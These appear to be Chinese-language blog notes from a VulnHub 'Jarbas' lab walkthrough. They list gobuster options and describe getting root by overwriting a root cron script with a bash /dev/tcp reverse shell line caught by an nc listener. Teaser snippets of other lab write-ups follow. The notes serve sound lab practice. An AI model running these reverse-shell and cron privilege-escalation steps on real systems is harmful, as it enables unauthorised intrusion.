youtube:
jarbas walkthrough | vulnhub
gobuster 子網域名稱/目錄暴力工具
-p string:基本auth的密碼(僅為dir模式)
-u string:基本auth的使用者名稱(僅為dir模式)
-a string:設定使用者**字串(dir模式)
-c string:用於請求的cookie(僅為dir模式)
-cn:顯示cnnex記錄(dns模式),不能與「-i」選項一起使用)
-e:擴充套件模式,列印完整url
-f:向每個目錄請求追加前斜線(僅為dir模式)
-fw:當萬用字元發現時,強制繼續操作
-i:顯示ip位址(僅dns模式)
-k:跳過ssl證書驗證
-l:包括在輸出中的主體長度(僅為dir模式)
-m string:目錄/檔案模式(dir)或dns模式(dns)(預設「dir」)
-n:不要列印狀態** -np:不顯示進度
-o string:輸出檔案以寫入結果(預設為stdut)
-p string:用於請求的**[http(s): //主機:埠](僅dir模式)
-q:不要列印橫幅和其他噪音
-r:追隨重定向
-s string:設定狀態碼(dir模式)(預設"200,204,301,302,307,403")
-t int:併發執行緒數(預設值10)
-to duration:http超時(僅限於dir模式)(預設10s)
-u string:目標url或域
-v:冗長輸出(錯誤)
-w string:暴力猜解的單詞列表的路徑
-x string:要搜尋的檔案擴充套件(僅限於dir模式)
goburst -u ip -w -x html,php,asp -t 10
dirbuster 暴力破解web目錄
msfconsole 找到乙個 script_console 進去
有wget
沒有gcc,yum必須管理員才能用,這條路斷掉
有定時任務
find -user root -writable -type f -not -path 「/proc/*」 2>/dev/null
找到以root許可權設的crontab定時任務的指令碼
reverse shell cheat sheet website:
download 改為 bash -i >& /dev/tcp/192.168.247.131(本機)/5555 0>&1 並upload
export term=screen
本機執行: nc -lvnp 192.168.247.131 5555
斷開 重連 連上了root
收穫:目錄工具的爆破,基於定時任務的linux提權
kali滲透綜合靶機 五 zico2靶機
kali滲透綜合靶機 五 zico2靶機 一 主機發現 二 埠掃瞄 三 埠服務識別 四 漏洞發現 1.訪問發現可能存在檔案包含漏洞 2.測試是否存在檔案包含漏洞,下圖說明存在存在檔案包含漏洞 3.掃瞄 目錄 4.測試資料庫是否可寫內容,在資料庫插入 phpinfo 然後結合檔案包含 然後結合檔案包含...
Bulldog 2靶機滲透
文章首發圈子社群 前兩天做了乙個靶機滲透題目,在此記錄一下 但如果靶機沒有顯示ip,可以用nmap掃瞄網段得到ip。的功能很簡單,註冊 登入以及瀏覽一些使用者資訊。簡單點了點 的功能,發現有登入和註冊,但是當我點選註冊的時候,介面顯示不讓註冊。有乙個user介面,裡面列出了9名使用者,有使用者名稱。...
靶機實戰2 bron2root
安裝的話,我使用了virtualbox,vmware對於一些靶機不相容,開啟不了 netdiscover掃瞄到靶機的ip 瀏覽器進入查詢一些資訊 三個使用者 hadijimmymartin 進行nmap掃瞄埠 這裡掃瞄到22 80 111 分別進入看看有沒有什麼資訊,但是無果 使用dirb查詢目錄檔...